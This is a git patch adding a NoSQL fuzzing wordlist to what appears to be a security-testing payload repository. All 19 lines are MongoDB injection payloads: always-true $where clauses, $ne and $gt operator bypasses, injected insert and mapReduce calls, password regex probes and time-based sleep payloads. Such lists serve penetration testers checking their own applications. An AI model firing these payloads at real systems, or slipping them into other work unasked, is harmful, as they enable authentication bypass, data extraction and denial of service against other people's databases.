From 46de2f672760326a7873ed830ab6d87fca3e290f Mon Sep 17 00:00:00 2001 From: Jason Haddix Date: Wed, 28 Jun 2017 11:25:16 -0700 Subject: [PATCH] Create NoSQL --- Fuzzing/NoSQL | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 Fuzzing/NoSQL diff --git a/Fuzzing/NoSQL b/Fuzzing/NoSQL new file mode 100644 index 0000000..180c8b3 --- /dev/null +++ b/Fuzzing/NoSQL @@ -0,0 +1,19 @@ +true, $where: '1 == 1' +, $where: '1 == 1' +$where: '1 == 1' +', $where: '1 == 1' +1, $where: '1 == 1' +{ $ne: 1 } +', $or: [ {}, { 'a':'a +' } ], $comment:'successful MongoDB injection' +db.injection.insert({success:1}); +db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 +|| 1==1 +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +{$gt: ''} +[$ne]=1 +';sleep(5000); +';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);